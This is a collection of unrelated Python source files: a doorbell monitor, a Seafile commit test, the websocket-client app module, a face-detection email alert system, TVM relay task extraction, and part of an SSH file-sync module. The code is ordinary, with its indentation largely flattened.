self.disable_doorbell_ring_sensor = True # To avoid triggering doorbell ring sensor when door is opened and closed
GPIO.output(self.open_door, True)
self.print_status("Door unlocked on ")
time.sleep(3)
GPIO.output(self.open_door, False)
self.print_status("Door locked on ")
self.disable_doorbell_ring_sensor = False # Reactivate doorbell ring sensor
def capture_video(self):
today = datetime.now()
time_stamp = today.strftime('%d%B%Y%H%M%S')
self.picture_file_name = self.auto_video_capture_directory + time_stamp + "picturedump.jpg"
print("Capturing picture in file " + self.picture_file_name)
subprocess.call(["fswebcam " + self.picture_file_name], shell=True)
def auto_possible(self):
today = datetime.now()
hour = int(today.strftime('%H'))
day = today.strftime('%A')
if day == "Saturday" or day == "Sunday":
weekday = False
else:
weekday = True
if self.disable_weekend == True and weekday == False:
active_day = False
else:
active_day = True
if hour >= self.active_auto_start and hour < self.active_auto_finish and active_day == True and self.entry_door_open == False:
return True
else:
return False
def start_linphone(self):
print('Starting Linphone')
self.linphone_active = True
subprocess.call(['linphonecsh init -' + self.linphone_video_parameter + ' -d 1 -l ' + self.linphone_debug_log_file +
" -c " + self.linphone_config_file], shell=True)
def stop_linphone(self):
print('Stopping Linphone')
self.linphone_active = False
subprocess.call(['linphonecsh exit'], shell=True)
def shutdown_cleanup(self):
# Shutdown LED flashing thread
        self.flash_leds.terminate()  # terminate() clears flash_enable and stops the flashing loop
GPIO.cleanup()
if self.linphone_in_manual_mode == True:
self.stop_linphone()
time.sleep(1)
self.today = datetime.now()
self.print_status("Doorbell Monitor Stopped on ")
self.idle_mode_enabled = False
self.manual_mode_enabled = False
self.auto_mode_enabled = False
self.triggered = False
self.ringing = False
self.shutdown = True
self.update_status()
self.client.loop_stop() # Stop mqtt monitoring thread
def process_home_manager_heartbeat(self):
if self.heartbeat_enabled == True:
self.heartbeat_count +=1
if self.heartbeat_count == 3000:
#self.print_status('Sending Heartbeat to Home Manager on ')
self.send_heartbeat_to_home_manager()
if self.heartbeat_count > 4500:
self.print_status('Home Manager Heartbeat Lost. Restarting code on ')
self.no_heartbeat_ack = True
self.shutdown_cleanup()
time.sleep(10)
self.restart_code()
def send_heartbeat_to_home_manager(self):
self.client.publish('DoorbellStatus', '{"service": "Heartbeat"}')
def restart_code(self):
self.client.publish('DoorbellStatus', '{"service": "Restart"}')
self.shutdown_cleanup()
os.system('sudo reboot')
def run(self):
self.led_cycle_duration = 0.05
self.led_cycle_count = 20
self.flash_leds = TwoLedFlash(self.led_cycle_duration, self.led_cycle_count)
self.flash_leds_thread = Thread(target=self.flash_leds.run)
self.flash_leds_thread.start()
self.print_status("Northcliff Doorbell Monitor Started on ")
if self.linphone_in_manual_mode == True:
self.start_linphone()
time.sleep(5)
print("Linphone Test Call on Startup")
subprocess.call(['linphonecsh dial ' + self.manual_mode_call_sip_address], shell=True)
time.sleep(25)
print("Terminating Linphone Test Call")
subprocess.call(["linphonecsh generic 'terminate'"], shell=True) # Terminate linphone call
self.stop_linphone()
else:
self.capture_video() # Capture picture on startup
if self.ask_for_auto_time_input == True:
self.input_auto_mode_times()
if self.disable_weekend == True:
print ("Active Auto Mode Start at " + str(self.active_auto_start) + ":00 Hours, Active Auto Mode Finish at " + str(self.active_auto_finish)
+ ":00 Hours, Auto Mode Disabled on Weekends")
else:
print ("Active Auto Mode Start at " + str(self.active_auto_start) + ":00 Hours, Active Auto Mode Finish at " + str(self.active_auto_finish)
+ ":00 Hours, Auto Mode Enabled on Weekends")
self.previous_auto_possible = True
self.idle_mode_startup()
self.auto_mode_attempt = False
if self.auto_on_startup == True:
self.process_auto_button(self.auto_button)
self.auto_mode_startup()
try:
while True: # Run Doorbell Monitor in continuous loop
self.current_auto_possible = self.auto_possible()
if self.auto_mode_enabled == True and self.current_auto_possible == True:
if self.previous_auto_possible == False or self.auto_mode_attempt == True:
self.auto_mode_attempt = False
self.auto_mode_startup()
self.auto_mode()
elif self.auto_mode_enabled == True and self.current_auto_possible == False:
if self.previous_auto_possible == True or self.auto_mode_attempt == True:
self.auto_mode_attempt = False
self.manual_mode_startup(normal_manual_flash = False) # Change LED Flashing in manual_mode_startup to indicate that auto has been disabled due to out of hours or door opening
self.manual_mode()
elif self.manual_mode_enabled == True:
self.manual_mode()
else:
self.idle_mode()
self.previous_auto_possible = self.current_auto_possible
self.process_home_manager_heartbeat()
time.sleep(0.1)
except KeyboardInterrupt: # Shutdown on ctrl C
# Shutdown main program
self.shutdown_cleanup()
if __name__ == '__main__': # This is where the overall code kicks off
monitor = NorthcliffDoorbellMonitor(pushover_in_manual_mode = True, full_video = False, ask_for_auto_time_input = False, active_auto_start = 7,
active_auto_finish = 19, disable_weekend = True, manual_mode_call_sip_address = "<Your SIP Address Here>",
pushover_token = "<Your Pushover Token Here>", pushover_user = "<Your Pushover User Here>",
linphone_debug_log_file = "<Your linphone debug log file location here>", auto_message_file = "<Your auto message file location here>",
auto_video_capture_directory = "<Your video capture directory location here>", linphone_config_file = "<Your linphone config file location here>",
auto_on_startup = True, linphone_in_manual_mode = True, heartbeat_enabled = True)
monitor.run()
|
test_commits.py
|
import threading
from ..base import BaseTest
from seafobj import commit_mgr
from seafobj.commits import SeafCommit
Success = True
class TestSeafCommitManager(BaseTest):
def setUp(self):
self.repo_id = self.TEST_CEPH_REPO_ID
self.repo_id_2 = self.TEST_CEPH_REPO_ID_2
self.head_commit = self.TEST_CEPH_HEAD_COMMIT
self.last_commit = self.TEST_CEPH_ADD_COMMIT
def load_commits(self):
seafcmt = commit_mgr.load_commit(self.repo_id, 1, self.head_commit)
self.assertTrue(isinstance(seafcmt, SeafCommit))
self.assertEqual('Renamed directory "create_renamed_folder"', seafcmt.description)
self.assertEqual('ffc32568c059e9532cb426f19f8138c624c5cdd4', seafcmt.parent_id)
self.assertEqual('obj_test', seafcmt.repo_name)
self.assertEqual(1517211913, seafcmt.ctime)
seafcmt = commit_mgr.load_commit(self.repo_id, 1, self.last_commit)
self.assertEqual('Modified "added_folder.md"', seafcmt.description)
self.assertEqual('9e4705d102d86756eb8ed9d8d16922ee3212c7c5', seafcmt.parent_id)
self.assertEqual('obj_test', seafcmt.repo_name)
self.assertEqual(1517211712, seafcmt.ctime)
def load_commits_2(self):
seafcmt = commit_mgr.load_commit(self.repo_id_2, 1, self.head_commit)
self.assertTrue(isinstance(seafcmt, SeafCommit))
self.assertEqual('Renamed directory "create_renamed_folder"', seafcmt.description)
self.assertEqual('ffc32568c059e9532cb426f19f8138c624c5cdd4', seafcmt.parent_id)
self.assertEqual('obj_test', seafcmt.repo_name)
self.assertEqual(1517211913, seafcmt.ctime)
seafcmt = commit_mgr.load_commit(self.repo_id_2, 1, self.last_commit)
self.assertEqual('Modified "added_folder.md"', seafcmt.description)
self.assertEqual('9e4705d102d86756eb8ed9d8d16922ee3212c7c5', seafcmt.parent_id)
self.assertEqual('obj_test', seafcmt.repo_name)
self.assertEqual(1517211712, seafcmt.ctime)
def test_load_commit(self):
test_multi = True
try:
obj_stores = commit_mgr.obj_stores
except AttributeError:
test_multi = False
if test_multi:
for i in range(100):
self.load_commits()
self.load_commits_2()
else:
for i in range(100):
self.load_commits()
def catch_with_commits(self):
try:
self.test_load_commit()
except AssertionError:
global Success
Success = False
#raise e
except Exception as e:
raise e
def test_load_commit_with_multi_thread(self):
ths = []
for i in range(20):
th = threading.Thread(target=self.catch_with_commits)
ths.append(th)
th.start()
for th in ths:
th.join()
self.assertTrue(Success)
|
_app.py
|
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
"""
WebSocketApp provides higher level APIs.
"""
import inspect
import select
import sys
import threading
import time
import traceback
import six
from ._abnf import ABNF
from ._core import WebSocket, getdefaulttimeout
from ._exceptions import *
from . import _logging
__all__ = ["WebSocketApp"]
class Dispatcher:
def __init__(self, app, ping_timeout):
self.app = app
self.ping_timeout = ping_timeout
def read(self, sock, read_callback, check_callback):
while self.app.keep_running:
r, w, e = select.select(
(self.app.sock.sock, ), (), (), self.ping_timeout)
if r:
if not read_callback():
break
check_callback()
class SSLDispatcher:
def __init__(self, app, ping_timeout):
self.app = app
self.ping_timeout = ping_timeout
def read(self, sock, read_callback, check_callback):
while self.app.keep_running:
r = self.select()
if r:
if not read_callback():
break
check_callback()
def select(self):
sock = self.app.sock.sock
if sock.pending():
return [sock,]
r, w, e = select.select((sock, ), (), (), self.ping_timeout)
return r
class WebSocketApp(object):
"""
    Higher-level APIs are provided.
    The interface is like the JavaScript WebSocket object.
"""
def __init__(self, url, header=None,
on_open=None, on_message=None, on_error=None,
on_close=None, on_ping=None, on_pong=None,
on_cont_message=None,
keep_running=True, get_mask_key=None, cookie=None,
subprotocols=None,
on_data=None):
"""
url: websocket url.
header: custom header for websocket handshake.
        on_open: callable object which is called when the websocket is opened.
            This function has one argument. The argument is this class object.
        on_message: callable object which is called when data is received.
            on_message has 2 arguments.
            The 1st argument is this class object.
            The 2nd argument is utf-8 string which we get from the server.
        on_error: callable object which is called when an error occurs.
            on_error has 2 arguments.
            The 1st argument is this class object.
            The 2nd argument is the exception object.
        on_close: callable object which is called when the connection is closed.
            This function has one argument. The argument is this class object.
        on_cont_message: callable object which is called when a continuation
            frame is received.
            on_cont_message has 3 arguments.
            The 1st argument is this class object.
            The 2nd argument is utf-8 string which we get from the server.
            The 3rd argument is the continue flag. If 0, the data continues
            to the next frame.
        on_data: callable object which is called when a message is received.
            This is called before on_message or on_cont_message,
            and then on_message or on_cont_message is called.
            on_data has 4 arguments.
            The 1st argument is this class object.
            The 2nd argument is utf-8 string which we get from the server.
            The 3rd argument is the data type: ABNF.OPCODE_TEXT or ABNF.OPCODE_BINARY.
            The 4th argument is the continue flag. If 0, the data continues
            to the next frame.
        keep_running: this parameter is obsolete and ignored.
get_mask_key: a callable to produce new mask keys,
see the WebSocket.set_mask_key's docstring for more information
subprotocols: array of available sub protocols. default is None.
"""
self.url = url
self.header = header if header is not None else []
self.cookie = cookie
self.on_open = on_open
self.on_message = on_message
self.on_data = on_data
self.on_error = on_error
self.on_close = on_close
self.on_ping = on_ping
self.on_pong = on_pong
self.on_cont_message = on_cont_message
self.keep_running = False
self.get_mask_key = get_mask_key
self.sock = None
self.last_ping_tm = 0
self.last_pong_tm = 0
self.subprotocols = subprotocols
def send(self, data, opcode=ABNF.OPCODE_TEXT):
"""
send message.
data: message to send. If you set opcode to OPCODE_TEXT,
data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
if not self.sock or self.sock.send(data, opcode) == 0:
raise WebSocketConnectionClosedException(
"Connection is already closed.")
def close(self, **kwargs):
"""
close websocket connection.
"""
self.keep_running = False
if self.sock:
self.sock.close(**kwargs)
self.sock = None
def _send_ping(self, interval, event):
while not event.wait(interval):
self.last_ping_tm = time.time()
if self.sock:
try:
self.sock.ping()
except Exception as ex:
_logging.warning("send_ping routine terminated: {}".format(ex))
break
def run_forever(self, sockopt=None, sslopt=None,
ping_interval=0, ping_timeout=None,
http_proxy_host=None, http_proxy_port=None,
http_no_proxy=None, http_proxy_auth=None,
skip_utf8_validation=False,
host=None, origin=None, dispatcher=None,
suppress_origin=False, proxy_type=None):
"""
run event loop for WebSocket framework.
This is an infinite loop that stays alive while the websocket connection is available.
sockopt: values for socket.setsockopt.
sockopt must be tuple
and each element is argument of sock.setsockopt.
sslopt: ssl socket optional dict.
ping_interval: automatically send a "ping" command
every specified period (in seconds).
If set to 0, no ping is sent automatically.
ping_timeout: timeout (in seconds) if the pong message is not received.
http_proxy_host: http proxy host name.
http_proxy_port: http proxy port. If not set, set to 80.
http_no_proxy: host names which should not go through the proxy.
skip_utf8_validation: skip utf8 validation.
host: update host header.
origin: update origin header.
dispatcher: customize reading data from socket.
suppress_origin: suppress outputting origin header.
Returns
-------
False if caught KeyboardInterrupt
True if other exception was raised during a loop
"""
if ping_timeout is not None and ping_timeout <= 0:
ping_timeout = None
if ping_timeout and ping_interval and ping_interval <= ping_timeout:
raise WebSocketException("Ensure ping_interval > ping_timeout")
if not sockopt:
sockopt = []
if not sslopt:
sslopt = {}
if self.sock:
raise WebSocketException("socket is already opened")
thread = None
self.keep_running = True
self.last_ping_tm = 0
self.last_pong_tm = 0
def teardown(close_frame=None):
"""
Tears down the connection.
If close_frame is set, we will invoke the on_close handler with the
statusCode and reason from there.
"""
if thread and thread.is_alive():
event.set()
thread.join()
self.keep_running = False
if self.sock:
self.sock.close()
close_args = self._get_close_args(
close_frame.data if close_frame else None)
self._callback(self.on_close, *close_args)
self.sock = None
try:
self.sock = WebSocket(
self.get_mask_key, sockopt=sockopt, sslopt=sslopt,
fire_cont_frame=self.on_cont_message is not None,
skip_utf8_validation=skip_utf8_validation,
enable_multithread=True if ping_interval else False)
self.sock.settimeout(getdefaulttimeout())
self.sock.connect(
self.url, header=self.header, cookie=self.cookie,
http_proxy_host=http_proxy_host,
http_proxy_port=http_proxy_port, http_no_proxy=http_no_proxy,
http_proxy_auth=http_proxy_auth, subprotocols=self.subprotocols,
host=host, origin=origin, suppress_origin=suppress_origin,
proxy_type=proxy_type)
if not dispatcher:
dispatcher = self.create_dispatcher(ping_timeout)
self._callback(self.on_open)
if ping_interval:
event = threading.Event()
thread = threading.Thread(
target=self._send_ping, args=(ping_interval, event))
thread.daemon = True
thread.start()
def read():
if not self.keep_running:
return teardown()
op_code, frame = self.sock.recv_data_frame(True)
if op_code == ABNF.OPCODE_CLOSE:
return teardown(frame)
elif op_code == ABNF.OPCODE_PING:
self._callback(self.on_ping, frame.data)
elif op_code == ABNF.OPCODE_PONG:
self.last_pong_tm = time.time()
self._callback(self.on_pong, frame.data)
elif op_code == ABNF.OPCODE_CONT and self.on_cont_message:
self._callback(self.on_data, frame.data,
frame.opcode, frame.fin)
self._callback(self.on_cont_message,
frame.data, frame.fin)
else:
data = frame.data
if six.PY3 and op_code == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
self._callback(self.on_data, data, frame.opcode, True)
self._callback(self.on_message, data)
return True
def check():
if (ping_timeout):
has_timeout_expired = time.time() - self.last_ping_tm > ping_timeout
has_pong_not_arrived_after_last_ping = self.last_pong_tm - self.last_ping_tm < 0
has_pong_arrived_too_late = self.last_pong_tm - self.last_ping_tm > ping_timeout
if (self.last_ping_tm
and has_timeout_expired
and (has_pong_not_arrived_after_last_ping or has_pong_arrived_too_late)):
raise WebSocketTimeoutException("ping/pong timed out")
return True
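            # Editor's note: check() above raises a ping/pong timeout only when a
            # ping has been sent, ping_timeout has elapsed since that ping, and the
            # matching pong either never arrived or arrived later than allowed.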
dispatcher.read(self.sock.sock, read, check)
except (Exception, KeyboardInterrupt, SystemExit) as e:
self._callback(self.on_error, e)
if isinstance(e, SystemExit):
# propagate SystemExit further
raise
teardown()
return not isinstance(e, KeyboardInterrupt)
def create_dispatcher(self, ping_timeout):
timeout = ping_timeout or 10
if self.sock.is_ssl():
return SSLDispatcher(self, timeout)
return Dispatcher(self, timeout)
def _get_close_args(self, data):
""" this functions extracts the code, reason from the close body
if they exists, and if the self.on_close except three arguments """
# if the on_close callback is "old", just return empty list
if sys.version_info < (3, 0):
if not self.on_close or len(inspect.getargspec(self.on_close).args) != 3:
return []
else:
if not self.on_close or len(inspect.getfullargspec(self.on_close).args) != 3:
return []
if data and len(data) >= 2:
code = 256 * six.byte2int(data[0:1]) + six.byte2int(data[1:2])
reason = data[2:].decode('utf-8')
return [code, reason]
return [None, None]
def _callback(self, callback, *args):
if callback:
try:
if inspect.ismethod(callback):
paramlen = len(inspect.signature(callback).parameters)
if paramlen == len(args) + 1:
callback(self, *args)
else:
callback(*args)
else:
callback(self, *args)
except Exception as e:
_logging.error("error from callback {}: {}".format(callback, e))
if _logging.isEnabledForDebug():
_, _, tb = sys.exc_info()
traceback.print_tb(tb)
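

# --- Usage sketch (editor's addition, not part of the original module) ---
# A minimal, hedged example of driving the WebSocketApp defined above; the URL
# is a placeholder and the callback signatures follow the __init__ docstring
# (the first argument of every callback is the WebSocketApp instance).
if __name__ == "__main__":
    def _on_open(ws):
        ws.send("hello")

    def _on_message(ws, message):
        print("received:", message)

    _app = WebSocketApp("ws://example.invalid/socket",
                        on_open=_on_open, on_message=_on_message)
    # run_forever requires ping_interval > ping_timeout when both are set.
    _app.run_forever(ping_interval=30, ping_timeout=10)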
|
alert_system.py
|
import requests
import logging
import datetime
from threading import Thread
import uuid
import cv2
import smtplib
from os.path import basename
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
import glob
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class AlertSystem():
def __init__(self, log_system, **kwargs):
self.email_user = kwargs.get("email_user")
self.email_passwd = kwargs.get("email_passwd")
self.email_from = kwargs.get("email_from")
self.email_to = kwargs.get("email_to")
self.log_system = log_system
self.camera_id = ""
self.timestamp = ""
self.last_alert = None
self.total_alerts = 0
def __send_email(self):
logger.info("Sending email to %s", self.email_to)
text = "Unidentified face detected at {}, on camera ID {}".format(self.timestamp, self.camera_id)
subject = '[Observer] Alert Triggered'
msg = MIMEMultipart()
msg['From'] = self.email_from
msg['To'] = self.email_to
msg['Date'] = self.timestamp
msg['Subject'] = subject
msg.attach(MIMEText(text))
# set attachments
files = glob.glob("/tmp/observer_*")
logger.info("Number of images attached to email: %s", len(files))
for f in files:
with open(f, "rb") as fil:
part = MIMEApplication(
fil.read(),
Name=basename(f)
)
part['Content-Disposition'] = 'attachment; filename="%s"' % basename(f)
msg.attach(part)
# The actual mail send
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
try:
server.login(self.email_user, self.email_passwd)
except smtplib.SMTPAuthenticationError:
logger.error("Bad Username or Password when trying to authenticate to email server.")
except Exception:
logger.error("Unknown error on login.")
else:
server.sendmail(self.email_from, self.email_to, msg.as_string())
finally:
server.quit()
def alert(self, image):
self.__send_email()
file_name = self.save_image_to_disk(image)
self.log_system.create_log(self.camera_id, file_name)
def save_image_to_disk(self, image):
file_name = 'image_alerts/' + str(uuid.uuid4()) + '.jpg'
cv2.imwrite('observer/obmng/static/' + file_name, image)
return file_name
def send_alert(self, camera_id, image):
self.camera_id = camera_id
self.timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
limit = 3
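        # Editor's note: 'limit' doubles as a minimum window length in seconds and
        # a minimum detection count; an email is only sent when more than 'limit'
        # detections have accumulated and more than 'limit' seconds have passed
        # since the window started, after which the window resets.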
if not self.last_alert:
self.last_alert = datetime.datetime.now()
time_diff = (datetime.datetime.now() - self.last_alert).seconds
if time_diff > limit:
if self.total_alerts > limit:
Thread(target=self.alert, args=(image, )).start()
print("Sending alerts")
print("Zeroing")
self.total_alerts = 0
self.last_alert = None
else:
print("Not enough time")
self.total_alerts += 1
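

# --- Usage sketch (editor's addition, not part of the original module) ---
# Illustrates the expected call pattern. The log system below is a stand-in for
# whatever object the caller normally provides; it only needs a
# create_log(camera_id, file_name) method. Credentials and the image are
# placeholders.
if __name__ == "__main__":
    import numpy as np

    class _StubLogSystem:
        def create_log(self, camera_id, file_name):
            logger.info("log entry: camera=%s file=%s", camera_id, file_name)

    alerts = AlertSystem(_StubLogSystem(),
                         email_user="user@example.com",
                         email_passwd="app-password",
                         email_from="user@example.com",
                         email_to="admin@example.com")
    frame = np.zeros((480, 640, 3), dtype=np.uint8)  # blank placeholder frame
    # Early calls only accumulate counters; an email and a saved image are
    # produced once the rate-limiting window in send_alert is exceeded.
    alerts.send_alert("camera-01", frame)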
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name, not-context-manager
"""
Decorator and utilities for the integration with TOPI and Relay
99.9% copy-paste of implementation by @MerryMercy
"""
import threading
import logging
import warnings
import tvm
from tvm.autotvm.task.dispatcher import DispatchContext, FallbackContext
from tvm.target import Target
from .task import create
from .topi_integration import TaskExtractEnv
logger = logging.getLogger("autotvm")
# TODO(moreau89) find a more elegant way to lower for VTAs
def _lower(mod, target, params):
"""Helper to lower VTA properly."""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_executor_codegen
if hasattr(target, "device_name") and target.device_name == "vta":
import vta
with vta.build_config(opt_level=3, disabled_pass={"AlterOpLayout"}):
mod, _ = relay.optimize(mod, target, params)
grc = graph_executor_codegen.GraphExecutorCodegen(None, target)
grc.codegen(mod["main"])
return
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
compiler.lower(mod, target=target)
def extract_from_program(mod, params, target, target_host=None, ops=None):
"""Extract tuning tasks from a relay program.
This function is the single program version of extract_from_multiple_program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
if target_host is not None:
warnings.warn(
"target_host parameter is going to be deprecated. "
"Please pass in tvm.target.Target(target, host=target_host) instead."
)
target, target_host = Target.check_and_update_host_consist(target, target_host)
return extract_from_multiple_program([mod], [params], target, ops=ops)
def extract_from_multiple_program(mods, params, target, target_host=None, ops=None):
"""Extract tuning tasks from multiple relay programs.
This function collects tuning tasks by building a list of programs
with a "tracing" target and tracing all the calls to topi.
Parameters
----------
mods: List[tvm.IRModule] or List[relay.function.Function]
The list of modules or functions to tune
params: List of dict of str to numpy array
The associated parameters of the programs
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm import topi
env = TaskExtractEnv.get()
# merge target and target host
target, target_host = Target.check_and_update_host_consist(target, target_host)
# run compiler to collect all TOPI calls during compilation
env.reset(ops)
with env:
# disable logger temporarily
old_state = logger.disabled
logger.disabled = True
for mod, param in zip(mods, params):
if isinstance(mod, relay.function.Function):
mod = tvm.IRModule.from_expr(mod)
assert isinstance(
mod, tvm.IRModule
), "only support relay Module or Function to be tuned"
relay.backend.te_compiler.get().clear()
# wrap build call in thread to avoid multiprocessing problems
build_thread = threading.Thread(target=_lower, args=(mod, target, param))
build_thread.start()
build_thread.join()
relay.backend.te_compiler.get().clear()
# Clear the warning message cache in FallbackContext
if isinstance(DispatchContext.current, FallbackContext):
DispatchContext.current.memory = {}
DispatchContext.warning_messages = set()
logger.disabled = old_state
# create tasks for target
tasks = []
for task_name, args in env.get_tasks():
try:
tsk = create(task_name, args, target=target)
tasks.append(tsk)
except topi.InvalidShapeError:
logger.warning("Invalid shape during AutoTVM task creation")
return tasks
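

# --- Usage sketch (editor's addition, not part of the original module) ---
# Shows how extract_from_program is typically driven. The tiny conv2d network
# below is a placeholder and assumes a working TVM installation with the LLVM
# backend enabled.
if __name__ == "__main__":
    import numpy as np
    from tvm import relay

    data = relay.var("data", shape=(1, 3, 224, 224))
    weight = relay.var("weight", shape=(16, 3, 3, 3))
    out = relay.nn.conv2d(data, weight, padding=(1, 1))
    mod = tvm.IRModule.from_expr(relay.Function([data, weight], out))
    params = {"weight": np.random.uniform(size=(16, 3, 3, 3)).astype("float32")}

    tasks = extract_from_program(mod, params, target=Target("llvm"))
    for tsk in tasks:
        logger.info("extracted task: %s", tsk)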
|
host.py
|
import abc
import os
import pathlib
import asyncssh
import asyncio
import getpass
import stat
import time
import logging
import posixpath
from io import BytesIO
from datetime import datetime
from aiofile import async_open
from queue import Queue, Empty
from threading import Thread
from fnmatch import fnmatchcase
log = logging.getLogger('iris')
IGNORED_PATTERNS = ('*.swpx', '*.md5', '.swp', '.swx', '.DS_Store', '~')
def enhance_pattern(pattern):
if pattern.endswith('/'): # Automatically append an * if a directory is specified
pattern = pattern + '*'
return pattern
def run(tasks):
if not isinstance(tasks, list):
tasks = [tasks]
loop = asyncio.get_event_loop()
res = loop.run_until_complete(asyncio.gather(*tasks))[0]
return res
class File:
def __init__(self, path, time, path_holder, change_type=None):
self.path = path
self.holder = path_holder
self.time = self.set_time(time) if time is not None else None
self.change_type = change_type
def set_time(self, time):
if isinstance(time, datetime):
return time
else:
if isinstance(time, str):
return datetime.fromtimestamp(int(float(time)))
else:
return datetime.fromtimestamp(int(time))
def fetch_time(self):
return self.holder.get_time(self.path)
def get_content(self):
return self.holder.get_content(self.path)
@property
def short_path(self):
return self.path.split(self.holder.path)[-1].split('/', 1)[-1]
def __repr__(self, short=True):
try:
return f'Path: {self.path} - {self.time.ctime()} - {self.time.timestamp()}'
except AttributeError:
return f'Path: {self.path}'
class Path:
def __init__(self, path, dry=False, pattern='*', ignore_pattern='//', *args, **kwargs):
self.path = path
self.host = None
self.dry = dry
self.pattern = pattern
self.ignore_pattern = ignore_pattern
self.wd = None
self.tasks = None
def has_pattern(self, p, path):
return any([fnmatchcase(p.split(path)[1], enhance_pattern(pat)) for pat in self.pattern.split()])
def has_ignore(self, p, path):
return any([fnmatchcase(p.split(path)[1], enhance_pattern(pat)) for pat in self.ignore_pattern.split()])
def __repr__(self):
return f'Host {self.host}:{self.path}'
def relative_path(self, path):
path = os.path.abspath(path)
return path.split(self.path)[1]
@abc.abstractmethod
def check_connection(self):
return True
async def _empty(self):
return None
def write(self, origin, target_holder, write_cb=None):
# Find correct path for target file
target_path = os.path.join(target_holder.path, origin.holder.relative_path(origin.path))
# Ignore some files (this is a good place as is implementation independent)
if target_path.endswith(IGNORED_PATTERNS) or self.has_ignore(target_path, target_holder.path):
log.debug(f'Ignored file {origin}')
return self._empty()
if not self.has_pattern(target_path, target_holder.path):
return self._empty()
if origin.change_type in [None, 'C', 'M']:
return self._write(origin, target_holder, write_cb)
else:
return self._delete(origin, target_holder, write_cb)
async def _delete(self, origin, target_holder, callback=None):
""" Delete file """
# Find correct path for target file
target_path = os.path.join(target_holder.path, origin.holder.relative_path(origin.path))
target = None
try:
target = await target_holder.get_file(target_path)
except FileNotFoundError:
return True
merged = False
if origin.time > target.time:
log.debug(f'Calling delete on {target_path}')
if not self.dry:
await target_holder._deletefile(target_path)
merged = True
if callback is not None:
callback(merged=merged, change='D')
return merged
async def _write(self, origin, target_holder, callback=None):
""" Overwrite target with origin if newer """
# Find correct path for target file
target_path = os.path.join(target_holder.path, origin.holder.relative_path(origin.path))
force = False
target = None
try:
target = await target_holder.get_file(target_path)
except FileNotFoundError:
force = True
# The watchdog returns a File instance with no time, so we fetch it now
try:
if origin.time is None:
origin.time = await origin.fetch_time()
except FileNotFoundError:
return False
merged = False
if force or origin.time > target.time:
origin_content = await origin.get_content()
if origin_content is None:
return False
log.debug(f'Calling write on {target_path}')
if not self.dry:
await target_holder._writefile(origin_content, target_path, mtime=origin.time)
merged = True
if callback is not None:
callback(merged=merged, change='M')
return merged
def next_task(self, n=100):
if self.tasks is None:
return None
res = []
try:
for i in range(n):
res.append(self.tasks.get_nowait())
except Empty:
pass
return res
@abc.abstractmethod
async def _writefile(self, origin, target, mtime):
raise NotImplementedError
@abc.abstractmethod
async def _deletefile(self, target):
raise NotImplementedError
@abc.abstractmethod
def all_files(self):
raise NotImplementedError
@abc.abstractmethod
async def get_content(self, path):
raise NotImplementedError
@abc.abstractmethod
async def get_file(self, path):
raise NotImplementedError
@abc.abstractmethod
async def get_time(self, path):
raise NotImplementedError
@abc.abstractmethod
def start_watchdog(self):
"""
This should start the watchdog process on the host
"""
raise NotImplementedError
@abc.abstractmethod
def cleanup(self):
pass
class RemotePath(Path):
def __init__(self, path, host, dry=False, pattern='*', ignore_pattern='//', key='~/.ssh/id_rsa', jump_host=None, *args, **kwargs):
super().__init__(path, dry, pattern, ignore_pattern, *args, **kwargs)
# Setup configs for connection
user = os.getlogin()
self.port = 22 # Default port
if '@' in host:
user, _, host = host.partition('@')
if ':' in host:
host, _, port = host.partition(':')
self.port = int(port)
self.host = host
self.user = user
# Jumping connection
self.jump = jump_host is not None
jump_user = os.getlogin()
self.jump_port = 22
if jump_host is not None:
if '@' in jump_host:
jump_user, _, jump_host = jump_host.partition('@')
if ':' in jump_host:
jump_host, _, jump_port = jump_host.partition(':')
self.jump_port = int(jump_port)
self.jump_host = jump_host
self.jump_user = jump_user
self.password = None
try:
self.key = RemotePath.load_agent_keys()
except ValueError:
try:
self.key = RemotePath.import_private_key(key)
except FileNotFoundError:
self.key = None
self.password = getpass.getpass('No valid key found, specify a password for auth: ')
self._conn = None
self._sftp = None
self._last_check = 0
self.open_sem = asyncio.Semaphore(128) # Max open files?
self.req = set()
@property
def conn(self):
if self._conn is None:
return self.ssh_connect()
return self._conn
@property
def sftp(self):
if self._sftp is None:
return self.sftp_connect()
return self._sftp
async def sftp_connect(self): # This is awaited on check connection
